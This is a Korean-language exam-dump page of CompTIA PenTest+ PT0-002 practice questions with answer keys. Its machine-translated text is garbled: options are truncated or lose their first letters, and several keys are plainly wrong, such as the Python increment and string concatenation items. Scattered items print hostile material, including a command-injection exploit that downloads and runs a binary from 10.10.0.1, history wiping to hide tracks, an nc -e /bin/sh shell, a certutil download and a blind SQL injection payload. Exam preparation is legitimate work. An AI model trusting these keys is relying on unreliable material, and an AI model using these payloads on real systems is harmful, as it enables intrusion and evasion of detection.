아무것도 놓치고 싶지 않으신가요?

인증 시험 합격 팁

최신 시험 소식 및 할인 정보

전문가가 선별하고 최신 정보를 제공합니다.

예, 뉴스레터를 보내주세요

CompTIA PT0-002 시험의 성공: 모의 테스트 및 학습 자료, CompTIA PenTest+ 인증 | SPOTO

모의고사 및 학습 자료를 통해 CompTIA PenTest+ (PT0-002) 자격증 시험에 합격할 수 있도록 준비하세요. 시험에 대비하는 가장 좋은 방법은 최신 시험 문제를 연습하는 것입니다. 학습 자료에는 모의고사, 샘플 문제, 시험 덤프, 시험 문제와 정답이 포함되어 있어 시험에 합격할 수 있도록 설계되었습니다. 침투 테스트 및 취약성 관리 업무를 담당하는 사이버 보안 전문가에게 이상적인 자격증은 CompTIA PenTest+입니다. 모의 시험과 시험 시뮬레이터에 액세스하여 실제 시험 조건을 시뮬레이션하고 자신감을 높일 수 있습니다. 시험 자료와 시험 답안을 활용하여 PT0-002 시험에 대한 이해와 준비를 강화할 수 있습니다. 종합적인 학습 자료와 모의고사를 통해 자신감을 가지고 준비하여 시험에 합격하세요

다른 온라인 시험에 응시하세요

질문 #1
보안 전문가가 TCP 포트 3011에서 수신 중인 독점 서비스에 유효하지 않은 패킷을 전송하여 IoT 장치를 테스트하려고 합니다. 다음 중 보안 전문가가 임의의 숫자를 사용하여 TCP 헤더 길이와 체크섬을 프로그래밍 방식으로 쉽게 조작하고 독점 서비스가 어떻게 응답하는지 관찰할 수 있는 방법은?
A. Nmap
B. tcpdump
C. capy
D. ping3
답변 보기
정답: C
질문 #2
침투 테스터가 기본 구성의 Windows 서버에서 낮은 권한 셸을 획득했으며 이제 잘못 구성된 서비스 권한을 악용하는 기능을 탐색하려고 합니다. 다음 중 테스터가 이 프로세스를 시작하는 데 도움이 되는 명령은 무엇인가요?
A. certutil -urlcache -split -f http://192
B. 파워쉘(새 개체 System
C. chtasks /query /fo LIST /v | find /I "다음 실행 시간:"
D. get http://192
답변 보기
정답: A
질문 #3
침투 테스터가 시스템에 액세스하여 지속성을 설정한 다음 다음 명령을 실행합니다: cat /dev/null > temp touch -r .bash_history temp mv temp .bash_history 다음 중 테스터가 수행했을 가능성이 가장 높은 작업은 무엇인가요?
A. Bash 히스토리를 /dev/null로 리디렉션하기
B. 추가 열거를 위해 사용자의 Bash 기록 복사본 만들기
C. ash 기록을 삭제하여 흔적 감추기
D. 고 대응자를 혼란스럽게 하기 위해 시스템에 미끼 파일 만들기
답변 보기
정답: A
질문 #4
보안 엔지니어가 네트워크에서 새 서버를 발견하고 해당 호스트가 승인된 버전의 Linux와 패치된 버전의 아파치를 실행하고 있는지 확인하기 위해 호스트를 검사하려고 합니다. 다음 중 이 작업을 수행하는 명령은 무엇인가요?
A. nmap -f -sV -p80 192
B. nmap -sS -sL -p80 192
C. map -A -T4 -p80 192
D. map -O -v -p80 192
답변 보기
정답: A
질문 #5
다음 코드가 주어집니다: 다음 중 이러한 유형의 공격을 방지하는 가장 좋은 방법은 무엇인가요? (두 가지를 선택하세요.)
A. 웹 애플리케이션 방화벽
B. 매개변수화된 쿼리
C. 력 인코딩
D. 션 토큰
E. 입력 유효성 검사
F. Base64 인코딩
답변 보기
정답: BE
질문 #6
최근 한 모의 침투 테스터가 기업 환경 내 핵심 네트워크 디바이스의 보안을 검토했습니다. 주요 결과는 다음과 같습니다: (cid:127) 네트워크 장치로 향하는 다음 요청이 가로채졌습니다: GET /로그인 HTTP/1.1 호스트: 10.50.100.16 사용자-에이전트: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Authorization: 기본 WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk (cid:127) 네트워크 관리 인터페이스를 사용할 수 있습니다
A. 강화된 비밀번호 복잡성 요건을 시행합니다
B. SSH 디먼을 비활성화하거나 업그레이드합니다
C. TTP/301 리디렉션 구성 비활성화
D. 리를 위해 대역 외 네트워크를 만듭니다
E. 더 나은 인증 방법을 구현합니다
F. 네트워크 관리 및 제어 인터페이스를 제거합니다
답변 보기
정답: CD
질문 #7
한 회사가 직원들을 대상으로 사회 공학적인 모의 침투 테스트를 수행하기 위해 모의 침투 테스터를 고용했습니다. 테스터는 회사 웹사이트에서 직원의 전화번호를 찾지 못했지만, 몇 달 전에 전체 전화번호 카탈로그가 게시되었다는 사실을 알게 되었습니다.다음 중 모의 침투 테스터가 가장 먼저 직원들의 전화번호를 찾아야 하는 곳은 어디일까요?
A. 웹 아카이브
B. GitHub
C. 파일 메타데이터
D. 언더그라운드 포럼
답변 보기
정답: A
질문 #8
한 임원이 여행 중에 회사 서버에 연결하기 위해 Wi-Fi를 사용해야 합니다. 이 임원은 사용 가능한 Wi-Fi 연결을 찾던 중 임원이 머무는 곳에서는 사용할 수 없는 호텔 체인에 대한 사용 가능한 액세스 포인트를 발견합니다. 다음 중 이 임원이 가장 가능성이 높은 공격은 무엇인가요?
A. 데이터 수정
B. 증폭
C. 캡티브 포털
D. 사악한 쌍둥이
답변 보기
정답: D
질문 #9
보호되지 않은 네트워크 파일 저장소에서 침투 테스트자는 사용자 이름과 비밀번호가 일반 텍스트로 된 텍스트 파일과 직원 50명의 이름, 역할, 일련 번호 등의 데이터가 포함된 스프레드시트를 발견합니다. 테스터는 텍스트 파일의 비밀번호 중 일부가 다음과 같은 형식을 따르고 있음을 알아챕니다: <이름-일련 번호>.다음 중 테스터가 이 정보를 가지고 다음에 취할 수 있는 가장 좋은 조치는 무엇인가요?
A. 비밀번호 스프레이 테스트에 대비하여 사용자 지정 비밀번호 사전을 만듭니다
B. 비밀번호를 안전하게 저장하려면 텍스트 파일 대신 비밀번호 관리자/볼트를 사용하는 것이 좋습니다
C. 모든 시스템과 애플리케이션에서 비밀번호 복잡성 규칙을 구성하는 것이 좋습니다
D. 보호되지 않은 파일 저장소를 침투 테스트 보고서의 발견 사항으로 문서화합니다
답변 보기
정답: D
질문 #10
무선 보안을 검토하기 위해 모의 침투 테스터와 계약을 맺었습니다. 테스터는 대상 기업 Wi-Fi의 구성을 모방한 악성 무선 AP를 배포했습니다. 이제 모의 침투 테스터는 근처의 무선 스테이션이 악성 AP에 강제로 연결되도록 시도하려고 합니다. 다음 중 테스터가 수행해야 할 다음 단계는 무엇인가요?
A. 인증 해제 프레임을 스테이션으로 보냅니다
B. 모든 2
C. 성 AP가 동적 주파수 선택 채널 내에서 브로드캐스트하도록 설정합니다
D. 전 공유 키를 사용하지 않도록 악성 AP 구성을 수정합니다
답변 보기
정답: B
질문 #11
모의 침투 테스터가 모의 침투 테스트를 수행하던 중 네트워크 트래픽이 더 이상 클라이언트의 IP 주소에 도달하지 않는 것을 발견했습니다. 테스터는 나중에 SOC가 모의 침투 테스터의 IP 주소에 싱크홀링을 사용했음을 발견했습니다. 다음 중 이 상황을 가장 잘 설명하는 것은 무엇인가요?
A. 모의 침투 테스터가 잘못된 자산을 테스트하고 있었습니다
B. 계획 프로세스에서 모든 팀에 알림을 제공하지 못했습니다
C. 클라이언트가 평가를 시작할 준비가 되지 않았습니다
D. 침투 테스터의 연락처 정보가 잘못되었습니다
답변 보기
정답: C
질문 #12
다음 중 인터넷에 직접 연결된 loT 디바이스와 관련된 가장 일반적인 취약점은 무엇인가요? IoT 디바이스는 쉽게 알아낼 수 있고 널리 알려진 기본 비밀번호와 함께 배송되는 경우가 많습니다. 많은 사용자가 이러한 기본 자격 증명을 변경하지 않아 디바이스가 무단 액세스에 취약한 상태로 방치됩니다. 이 문제는 인터넷에 직접 연결된 IoT 디바이스와 관련된 가장 일반적인 취약점 중 하나입니다. 공격자는 이러한 기본 비밀번호를 악용하여 다음과 같은 이점을 얻을 수 있습니다
A. 지원되지 않는 운영 체제
B. DoS 공격에 대한 취약성
C. 트워크에 연결할 수 없음
D. 기본 비밀번호의 존재 여부
답변 보기
정답: D
질문 #13
침투 테스터가 서버의 취약점을 악용하여 원격으로 페이로드를 실행하여 셸을 획득했습니다. 그러나 연결이 설정되지 않았고 페이로드 실행에 오류가 표시되지 않았습니다. 모의 침투 테스터는 IPS 또는 차세대 방화벽과 같은 네트워크 장치가 연결을 끊는다고 의심했습니다. 다음 중 셸을 성공적으로 설정할 가능성이 가장 높은 페이로드는 무엇인가요?
A. windows/x64/meterpreter/reverse_tcp
B. windows/x64/meterpreter/reverse_http
C. windows/x64/shell_reverse_tcp
D. windows/x64/powershell_reverse_tcp
E. windows/x64/meterpreter/reverse_https
답변 보기
정답: D
질문 #14
다음 중 파이썬에서 변수 값을 1씩 증가시키는 표현식은 무엇입니까(두 개 선택)?
A. al++
B. +val
C. al=(val+1)
D. +val
E. al=val++
F. val+=1
답변 보기
정답: C
질문 #15
다음 중 OWASP Top 10 v2017에 포함된 웹 애플리케이션 보안 위험은 무엇인가요? (두 가지를 선택하세요.)
A. 버퍼 오버플로
B. 차 사이트 스크립팅
C. 쟁 조건 공격
D. 로데이 공격
E. 사출 결함
F. 랜섬웨어 공격
답변 보기
정답: C
질문 #16
침투 테스터가 Linux 기반 파일 서버에 대한 루트 액세스 권한을 얻었으며 재부팅 후에도 지속성을 유지하고자 합니다. 다음 중 이 목표를 가장 잘 지원하는 기술은 무엇인가요?
A. 원샷 시스템드 서비스를 생성하여 리버스 셸을 설정합니다
B. Etc/shadow를 가져와 루트 비밀번호를 무차별 대입합니다
C. c -e /bin/sh를 실행합니다<
D. 면으로 이동하여 LDAP에서 사용자 계정 만들기
답변 보기
정답: B
질문 #17
다음 중 커뮤니케이션이 모의 침투 테스트의 중요한 단계인 이유를 가장 잘 설명하는 것은 무엇인가요? 커뮤니케이션은 모의 침투 테스트의 중요한 단계로, 관련된 모든 당사자가 테스트의 진행 상황, 결과 및 비즈니스 운영에 미칠 수 있는 잠재적 영향을 인지할 수 있도록 해야 합니다. 상황 인식에 대한 논의에는 보안 상태, 발견된 취약점 및 잠재적 위험에 대한 실시간 인사이트 공유가 포함됩니다. 이를 통해 조직은 정보에 입각한 의사 결정을 내리고, 위험을 신속하게 완화하며, 다음을 보장할 수 있습니다
A. 상황 인식에 대해 논의합니다
B. 비상 연락처와 친밀감을 쌓기 위해
C. 이터 파기 프로세스에 대해 설명합니다
D. 후 평가의 가능성을 보장하기 위해
답변 보기
정답: A
질문 #18
모의 침투 테스터는 퍼블릭 클라우드 제공업체에서 호스팅하는 웹 애플리케이션을 테스트하고 있습니다. 테스터는 공급자의 메타데이터를 쿼리하여 인스턴스가 자신을 인증하는 데 사용하는 자격 증명을 얻을 수 있습니다. 테스터가 익스플로잇한 취약점은 다음 중 어느 것입니까?
A. 사이트 간 요청 위조
B. 서버 측 요청 위조
C. 원격 파일 포함
D. 로컬 코드 포함
답변 보기
정답: B
질문 #19
침투 테스터가 검색 스캔을 수행하여 다음을 생성했습니다: 다음 중 위의 결과를 생성하고 추가 분석을 위해 활성 호스트 목록으로 변환하는 명령은 무엇입니까?
A. nmap -oG list
B. nmap -sn 192
C. map --open 192
D. map -o 192
답변 보기
정답: AC
질문 #20
다음 중 OWASP Top 10을 가장 잘 설명하는 것은 무엇인가요? (두 가지를 선택하세요.)
A. 웹 애플리케이션의 가장 중요한 위험
B. 웹 애플리케이션의 모든 위험 목록
C. 요도 순으로 정의된 위험
D. 웹 애플리케이션 보안 표준
E. 리스크 거버넌스 및 규정 준수 프레임워크
F. 아파치 취약점 체크리스트
답변 보기
정답: D
질문 #21
고객이 보안 평가 회사에서 인기 사이트에 대한 모의 침투 테스트를 수행하기를 원합니다. 이 테스트의 목적은 비즈니스 연속성 중단을 방지하는 방어의 효과를 확인하는 것입니다. 다음 중 이러한 유형의 평가를 시작하기 전에 취해야 할 가장 중요한 조치는 무엇인가요?
A. 고객이 SOW에 서명했는지 확인합니다
B. 클라이언트가 핫 사이트에 대한 네트워크 액세스 권한을 부여했는지 확인합니다
C. 장애 조치 환경이 클라이언트가 소유하지 않은 리소스에 의존하는지 확인합니다
D. 객과의 커뮤니케이션 및 에스컬레이션 절차를 수립합니다
답변 보기
정답: A
질문 #22
모의 침투 테스터는 고객과 협력하기 전에 다음 SOW를 검토합니다: "네트워크 다이어그램, 논리적 및 물리적 자산 인벤토리, 직원의 이름은 고객 기밀로 취급되어야 합니다. 모의 침투 테스트가 완료되면 모의 침투 테스터는 암호화된 프로토콜을 통해 고객의 최고 정보 보안 책임자(CISO)에게 결과를 제출하고 이후 모든 결과를 안전한 방식으로 삭제하여 폐기합니다." SOW의 정보에 근거하여 다음 중 어떤 행동에 해당하나요?
A. 감사 및 검사를 위해 일반인이나 고객이 사용할 수 없는 독점적인 침투 테스트 도구를 활용합니다
B. 공개 키 암호화를 활용하여 조사 완료 시 조사 결과가 CISO에게 전달되도록 합니다
C. 고객의 고위 경영진을 달래기 위해 고객 아키텍처 내에 존재하는 중요한 취약점을 고객과 공유하지 않는 경우
D. 라이언트의 공용 IP 주소를 공유하여 지하 해커 포럼에 참여하는 데 도움을 요청합니다
E. 소프트웨어 기반 삭제 도구를 사용하여 침투 테스터의 노트북에서 클라이언트의 조사 결과를 지웁니다
F. 영업팀이 향후 계약을 계획할 수 있도록 침투 테스터의 회사 내에 SOW를 보관하여 향후 사용하도록 합니다
답변 보기
정답: CD
질문 #23
SCADA 디바이스가 있는 환경에 대해 모의 침투 테스트를 수행하면 추가적인 안전 위험이 발생할 수 있습니다:
A. 기기는 더 많은 열을 발생시키고 더 많은 전력을 소비합니다
B. 기기가 구형이며 더 이상 교체할 수 없는 경우
C. 로토콜은 이해하기 더 어렵습니다
D. 바이스는 물리적 세계 효과를 유발할 수 있습니다
답변 보기
정답: D
질문 #24
침투 테스터가 dirb 유틸리티를 사용하여 웹 서버를 검사한 후 다음과 같은 결과를 얻었습니다: ... 생성된 단어: 4612 ---- 검사 URL: http://10.2.10.13/ ---- + http://10.2.10.13/about (CODE:200|SIZE:1520) + http://10.2.10.13/home.html (CODE:200|SIZE:214) + http://10.2.10.13/index.html (CODE:200|SIZE:214) + http://10.2.10.13/info (CODE:200 | SIZE:214) ... 다운로드: 4612 - 발견: 4 다음 중 침투 테스터에 유용한 정보를 포함할 가능성이 가장 높은 요소는?
A. index
B. C
답변 보기
정답: AC
질문 #25
최근 한 모의 침투 테스터가 기업 환경 내 핵심 네트워크 디바이스의 보안을 검토했습니다. 주요 결과는 다음과 같습니다: 다음 요청이 네트워크 장치로 전송되는 것을 가로챘습니다:GET /로그인 HTTP/1.1 호스트: 10.50.100.16 사용자-에이전트: Mozilla/5.0 (X11; Linux x86_64; rv:31.0)Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Authorization: 기본 WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk 네트워크 관리 인터페이스는 프로덕션에서 사용할 수 있습니다
A. 강화된 비밀번호 복잡성 요건을 시행합니다
B. SSH 디먼을 비활성화하거나 업그레이드합니다
C. HTTP/301 리디렉션 구성을 비활성화합니다
D. 관리를 위해 대역 외 네트워크를 만듭니다
E. 더 나은 인증 방법을 구현합니다
F. 네트워크 관리 및 제어 인터페이스를 제거합니다
답변 보기
정답: AE
질문 #26
모의 침투 테스터가 한 번의 모의 침투에 사용하기 위해 다음 스크립트를 작성했습니다: 이 스크립트는 다음 중 어떤 작업을 수행합니까?
A. 열린 포트를 찾습니다
B. 리버스 셸을 들어보세요
C. 린 포트에 침수를 시도합니다
D. 호화된 터널을 생성합니다
답변 보기
정답: A
질문 #27
모의 침투 테스터가 웹사이트에서 발견된 검색 양식에 대한 입력 유효성 검사를 테스트하고 있습니다. 다음 중 웹사이트의 취약점을 테스트하는 데 가장 적합한 옵션은 무엇인가요?
A. 표
B. 더블 대시
C. 은따옴표
D. 미콜론
답변 보기
정답: C
질문 #28
침투 테스터가 다음 페이로드를 사용하여 취약점을 익스플로잇하는 데 성공했습니다: IF (1=1) WAIT FOR DELAY '0:0:15' 다음 중 이 유형의 OL 공격을 가장 잘 완화할 수 있는 조치는 무엇입니까? 침투 테스터가 사용하는 페이로드는 조건이 참일 경우 데이터베이스의 응답을 15초 지연시키는 블라인드 SQL 인젝션 공격의 한 유형입니다. 이는 일련의 참 또는 거짓 질문을 통해 데이터베이스에서 정보를 추출하는 데 사용될 수 있습니다. 이러한 유형의 공격을 방지하는 가장 좋은 방법은 다음과 같습니다
A. 비밀번호 암호화
B. 리 매개변수화
C. 코딩 출력
D. TML 살균
답변 보기
정답: B
질문 #29
침투 테스터가 탐지되지 않고 정찰을 수행하려고 합니다. 다음 중 탐지될 가능성이 최소인 활동은 무엇인가요? (두 가지를 선택하세요.)
A. 오픈 소스 연구
B. 핑 스윕 C
E. 취약성 검사
F. Nmap 스캔
답변 보기
정답: B
질문 #30
새로운 보안 회사가 첫 번째 고객을 온보딩하고 있습니다. 이 고객은 주말 동안만 테스트를 허용했고 월요일 아침까지 결과가 필요했습니다. 그러나 평가 팀은 월요일까지 예상대로 환경에 액세스할 수 없었습니다. 다음 중 보안 회사가 평가 시작 전에 확보했어야 하는 것은 무엇인가요?
A. 서명된 작업 내역서
B. 올바른 사용자 계정 및 관련 비밀번호 C
답변 보기
정답: B
질문 #31
다음과 같은 출력이 주어집니다: 사용자-에이전트:* 허용하지 않음: /author/ Disallow: /xmlrpc.php Disallow: /wp-admin Disallow: /page/ 다음 중 이 출력을 얻을 가능성이 가장 높은 활동은 무엇인가요?
A. 웹사이트 스크래핑
B. 웹사이트 복제
C. 메인 열거
D. RL 열거형
답변 보기
정답: CF
질문 #32
고객 조직에 대한 모의 침투 평가에서 모의 침투 테스터가 오래된 소프트웨어 패키지 버전이 여러 대의 중요 서버에 설치되어 있음을 발견했습니다. 다음 중 이 문제를 가장 잘 완화할 수 있는 방법은 무엇인가요? 이 문제를 완화하는 가장 좋은 방법은 취약성, 버그 또는 성능 문제를 해결하기 위해 소프트웨어 패키지에 업데이트 또는 수정 사항을 적용하고 소프트웨어 패키지에 대한 변경 사항을 관리 또는 문서화하는 프로세스인 패치 및 변경 제어 프로그램을 구현하는 것입니다
A. 패치 및 변경 제어 프로그램 구현
B. 스템 업데이트를 수행하는 데 사용되는 클라이언트 스크립트 수정
C. 객사의 시스템 관리자를 위한 보수 교육
D. 품질 보증이 승인할 때까지 시스템 패치 적용을 자제합니다
답변 보기
정답: A
질문 #33
모의 침투 테스터는 회사 운영에 대한 중단을 최소화해야 하는 고객을 위한 활동을 준비 중입니다. 다음 중 수동 정찰 도구로 간주되는 것은 무엇입니까? (두 개를 선택하세요.) A. 와이어샤크
B. Nessus
C. etina
D. urp Suite
E. 쇼단
F. Nikto
답변 보기
정답: AC
질문 #34
문자열 값을 다른 문자열에 추가하는 것을 호출합니다:
A. 편집
B. 연결
C. oncatenation
D. onjunction
답변 보기
정답: A
질문 #35
한 회사에서 직원들에게 회사 SSO 포털을 모방한 사이트 링크가 포함된 이메일을 보내 모의 피싱 공격을 실시했습니다. 이메일을 받은 직원의 80%가 링크를 클릭하고 가짜 사이트에 회사 자격 증명을 제공했습니다. 다음 중 이 상황을 가장 잘 해결할 수 있는 권장 사항은 무엇인가요?
A. 모든 사용자를 대상으로 반복적인 사이버 보안 인식 교육 프로그램을 실시합니다
B. 모든 기업 애플리케이션에 다단계 인증을 구현합니다
C. 사 프록시에 승인되지 않은 사이트 목록을 정의하여 직원의 웹 탐색을 제한합니다
D. 메일 보안 게이트웨이를 구현하여 이메일 통신에서 스팸 및 멀웨어를 차단합니다
답변 보기
정답: A
질문 #36
침투 테스트자는 익스플로잇을 사용하여 시스템에 접속할 수 있었습니다. 다음은 사용된 코드의 스니펫입니다: exploit = "POST " exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} - c${IFS}'cd${IFS}/ tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${I FS}./apache'%0A%27&loginUser=a&Pwd=a" exploit += "HTTP/1.1" 침투 테스트자가 참여 후 실행해야 하는 명령은 다음 중 어느 것입니까?
A. grep -v apache ~/
B. rm -rf /tmp/apache C
답변 보기
정답: D
질문 #37
침투 테스트 팀이 건물에 들어가기 위해 물리적 침투 테스트를 진행하고 있습니다. 다음 중 침투 테스트 팀이 계약서 사본을 휴대해야 하는 이유는 무엇인가요?
A. 원본 문서 분실 시를 대비한 백업용
B. 건물 입구로 안내하기
C. 라이언트와 청구 정보를 확인하려면 다음과 같이 하세요
D. 견될 경우를 대비한 증거로
답변 보기
정답: A
질문 #38
한 회사는 제조 공장의 사이버 물리 시스템을 검토하기 위해 모의 침투 테스트 팀을 고용했습니다. 이 팀은 즉시 감독 시스템과 PLC가 모두 회사 인트라넷에 연결되어 있음을 발견했습니다. 다음 중 모의 침투 테스트 팀이 내린 가정 중 가장 타당할 가능성이 높은 가정은 무엇인가요?
A. PLC는 네트워크를 통해 주입된 명령에 따라 동작하지 않습니다
B. 감독자와 컨트롤러는 기본적으로 별도의 가상 네트워크에 있습니다
C. 트롤러는 명령의 출처를 확인하지 않습니다
D. 독 시스템은 악의적인 코드/명령의 주입을 감지합니다
답변 보기
정답: C
질문 #39
보안 평가를 수행 중인 모의 침투 테스터가 사이버 범죄자들이 중요한 취약점을 적극적으로 악용하고 있는 것을 발견했습니다. 다음 중 테스터가 다음에 해야 할 일은 무엇인가요?
A. 기본 연락 담당자에게 연락하기
B. 공격자를 쓰러뜨리기
C. 시 법 집행 기관에 연락
D. 절한 증거를 수집하여 최종 보고서에 추가합니다
답변 보기
정답: CE
질문 #40
침투 테스터가 공유를 열거하고 있으며 다음과 같은 출력을 받습니다: 다음 중 침투 테스트가 다음에 열거해야 하는 것은 무엇인가요? 표시되는 출력은 SMB(서버 메시지 블록) 프로토콜을 사용하는 시스템에서 공유 디렉터리를 나열하기 위해 smbclient 또는 enum4linux와 같은 도구를 사용할 때 볼 수 있는 일반적인 출력입니다. 다음은 발견된 공유 리소스에 대한 간략한 개요입니다. print$ - 이 공유는 일반적으로 프린터 드라이버에 사용됩니다. 2. home - 사용자의 홈 디렉터일 수 있습니다
A. ev
B. rint$
C. ome
D. otes
답변 보기
정답: A
질문 #41
침투 테스터가 알 수 없는 환경 테스트 중에 ping -A 명령을 실행했는데 128 TTL 패킷이 반환되었습니다. 다음 중 이 유형의 패킷을 반환할 가능성이 가장 높은 OS는 무엇인가요?
A. Windows
B. Apple
C. inux
D. ndroid
답변 보기
정답: A
질문 #42
다음 중 침투 테스트에 대한 구체적인 활동, 결과물 및 일정을 설명하는 문서는 무엇인가요?
A. NDA
B. SA
C. OW
D. OU
답변 보기
정답: C
질문 #43
회사에서 요청한 평가를 수행하는 모의 침투 테스터가 이중 태깅을 사용하여 트래픽을 다른 시스템으로 보내려고 합니다. 다음 중 이 목표를 가장 잘 달성할 수 있는 기술은 무엇인가요?
A. RFID 복제
B. RFID 태깅
C. 타 태깅
D. 그 중첩
답변 보기
정답: D
질문 #44
다음 중 침투 테스트 도구의 입력으로 스크립트나 프로그램에 공급할 수 있는 영숫자 데이터를 저장하는 데 사용할 수 있는 것은 무엇인가요?
A. 사전
B. 디렉토리
C. 심링크
D. 카탈로그
E. 포-루프
답변 보기
정답: A
질문 #45
공격자 컴퓨터의 로그에서 다음 PowerShell 스니펫이 추출되었습니다.침투 테스터가 배열의 존재를 확인하려고 합니다. 다음 중 배열을 정의하는 줄 번호는 무엇인가요?
A. 8호선
B. 13번 라인
C. 19번 라인
D. 20번 라인
답변 보기
정답: A
질문 #46
다음 중 애플리케이션 코드에서 타사 오픈 소스 라이브러리를 사용할 때 가장 우려되는 점은 무엇인가요? (두 가지를 선택하세요.)
A. 라이브러리가 취약할 수 있습니다
B. 소프트웨어의 라이선스가 모호함 C
E. 라이브러리가 지원되지 않을 수 있습니다
F. 라이브러리로 인해 애플리케이션이 손상될 수 있습니다
답변 보기
정답: B
질문 #47
컨설턴트가 간헐적인 연결 문제를 보고받은 후 다음 결과를 검토하고 있습니다: ? (192.168.1.1) AT 0A:D1:FA:B1:01:67 ON EN0 IFSCOPE [ETHERNET] ? (192.168.1.12) AT 34:A4:BE:09:44:F4 ON EN0 IFSCOPE [ETHERNET] ? (192.168.1.17) AT 92:60:29:12:AC:D2 ON EN0 IFSCOPE [ETHERNET] ? (192.168.1.34) AT 88:DE:A9:12:CE:FB ON EN0 IFSCOPE [ETHERNET] ? (192.168.1.136) AT 0A:D1:FA:B1:01:67 ON EN0 IFSCOPE [ETHERNET] ? (192.168.1.255) AT FF:FF:FF:FF:FF ON EN0 IFSCOPE [ETHERNET] ? (224.0.0.251) AT 01:02:5E:7
A. 네트워크에 있는 장치의 IP 주소가 잘못된 서브넷에 있습니다
B. 잘못된 멀티캐스트 그룹을 사용하여 멀티캐스트 세션이 시작되었습니다
C. RP 플러딩 공격은 브로드캐스트 주소를 사용하여 DDoS를 수행하는 것입니다
네트워크의 디바이스가 ARP 캐시를 오염시켰습니다.
답변 보기
정답: AE

제출 후 답변 보기

질문에 대한 답변을 얻으려면 이메일과 WhatsApp을 제출하세요.

참고: 올바른 시험 결과를 얻을 수 있도록 이메일 ID와 Whatsapp이 유효한지 확인하십시오.

이메일:
WhatsApp/전화번호: